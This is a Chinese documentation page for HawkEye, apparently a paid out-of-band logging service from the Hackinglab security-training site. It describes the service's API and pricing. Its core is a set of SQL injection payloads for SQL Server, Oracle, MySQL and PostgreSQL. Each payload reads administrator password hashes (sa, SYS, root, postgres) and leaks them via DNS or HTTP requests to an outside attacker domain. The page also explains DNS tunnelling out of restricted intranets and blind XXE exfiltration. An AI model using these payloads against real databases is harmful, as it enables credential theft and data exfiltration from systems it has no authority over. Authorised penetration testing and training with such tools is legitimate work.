HawkEye 基础Api使用说明

目标定位

HawkEye 基础Api为方便快捷的使用而设计,可以通过基础Api快速获取系统的日志信息。

使用说明

APIURL

http://hawkeye.hackinglab.cn/HawkApiBasic.php

参数说明

传入参数 参数说明 是否必选
ak ApiKey Y
type 查询类型(WEB/DNS) Y
num 每次返回的数量,最大500,默认返回10条 N

返回值说明

通用说明
type字段返回当前查询的类型
url字段返回用户的基础域名
data字段返回相应的信息

WEB
DATA
path字段返回访问路径
data字段返回post数据
返回顺序为最新收到的优先

{"type":"WEB","URL":"userdomain.xxx.com","DATA":[{"path":"\/","data":""},{"path":"\/robots.txt","data":""}]}

DNS
DATA
返回顺序为最新收到的优先

{"type":"DNS","URL":"userdomain.xxx.xxx.com","DATA":["userdomain.xxx.xxx.com.","Linux.userdomain..xxx.xxx.com"]}

异常返回

异常返回 说明
error 发生异常,建议重新生成apikey

Hawkeye: http://hawkeye.hackinglab.cn/

支持的数据库类型

  • SQL Server
  • Mysql
  • Oracl
  • PostgresSQL

注入姿势

SQL Server

Example:

DECLARE @host varchar(1024);
  SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.s.livesina.com';
  EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

Oracle

Example1:

SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');

Example2:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example3:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;

Example4:

SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;

Example5:

SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;

Example6:

 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;

Mysql

Exmaple:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));

PostgreSQL

Example:

DROP TABLE IF EXISTS table_output;
   CREATE TABLE table_output(content text);
   CREATE OR REPLACE FUNCTION temp_function()
   RETURNS VOID AS $$
   DECLARE exec_cmd TEXT;
   DECLARE query_result TEXT;
BEGIN
   SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
   exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
   EXECUTE exec_cmd;
   END;
   $$ LANGUAGE plpgsql SECURITY DEFINER;
   SELECT temp_function();

HawkEye DNs

HawkEye鹰眼系统发布,这个系统可以用在内网服务器映射到公网而且内网服务器没有访问公网建立TCP请求的权限,而且没办法直接获取数据的情况,因此可以使用一般不会被封堵的DNS隧道来向外发送数据.

HawkEye Log

还有一种情况,在发现类似于XXE这种漏洞,能够访问外网,但是没办法直接回显数据的情况,可以通过URL拼接的方式获取数据(Oracle数据库也可以发起http请求,看具体场景)
还有一些其他的高级渗透情况…….希望大家一起来补充.

费用

平台采用付费方式运行,因为后端要跑一台VPS,还要域名续费,还要SAE平台的Web流量和Mysql查询次数都需要费用,当然这都是在不计开发成本和人力成本的情况下的.所以平台不希望以一种完全免费的方式运行,而采取更能够鼓励我们开发团队进步的收费方式进行.但是费用不会太高,初步定价是10RMB使用3个月,因此一个月才3元多一点,相当于来电显示费用,可是来电显示却远远不能提供给我们这样的服务…..

访问地址

平台URL: http://hawkeye.hackinglab.cn/Index/Charge.php

平台特性

平台采用HackingLab统一的SSO方式进行登录,因此你需要在Hackinglab.cn登录你的账号.
不过请放心,Hackinglab.cn采用的是Oauth方式进行登录(支持微博和QQ),因此您完全不必要担心Hackinglab被入侵的最坏情况而导致您的账号被窃取的问题.大家都知道,没有一个系统是安全的…..但是我们也会尽最大努力确保平台的安全运行.
HackingLab.cn使用微博和QQ登录均会自动创建账号.
创建账号后,点击左边的功能区,HawkEye鹰眼来进入我们的HawkEye鹰眼系统.

进入后,您需要联系客服@喵喵_哒付费,付费可通过微信面对面付款,也可以直接给我转wb,告诉我你的用户名和第一次登录的大致时间,我们客服将会给您开通相应的使用权限.

么么哒

我们支持大家发现平台的漏洞,但不希望对平台造成破坏,并恳请各位大哥大姐,不要DDOS咱们的服务器,希望这样一个平台能够给大家一个轻松便捷的方式来进行高级一点的渗透测试,节省您的宝贵时间.

同时,欢迎童鞋们进行打赏!! 据说您的打赏将直接决定我们的客服妹纸下个月做头发的次数……._^

最后,恳请各大黑阔不要攻击我们的平台,真心的….感谢!

平台截图

HackingDocs: http://docs.hackinglab.cn/
HackingLab: http://hackinglab.cn/

开发团队

Hackinglab是由GXEM安全测试小组和Xseclab网络安全实验室共同开发和维护的一套在线学习平台.

目标

Hackinglab致力于将更多的人加入到安全圈子,将安全基础安全技能传授到千家万户.

愿景

Hackinglab希望能够通过题目和通关的方式给用户提供学习的方向和推动力,让信息安全爱好者能够发现自己的不足之处,并能够根据题目的知识范围来进行自主学习.

定性

Hackinglab不仅是一个通关平台,更是一个集学习/交流/提升于一体的在线平台.

组成

Hackinglab目前由Hackinglab官网题目平台/Hackinglab Topic问答系统/Hackwiki学习系统/HackingDocs 等组成,后续还会有在线实验环境以及以安全为核心的在线游戏平台等.
在这里你将学习到Hackinglab官网题目的相关通过方法和通过技巧. 你将会看到各路大牛提供给我们学习的相关经验和分享

开始

如何注册hackinglab
如何登陆hackinglab
如何开始交流
如何开始学习
过关思路
基础关
脚本关
注入关
上传关
解密关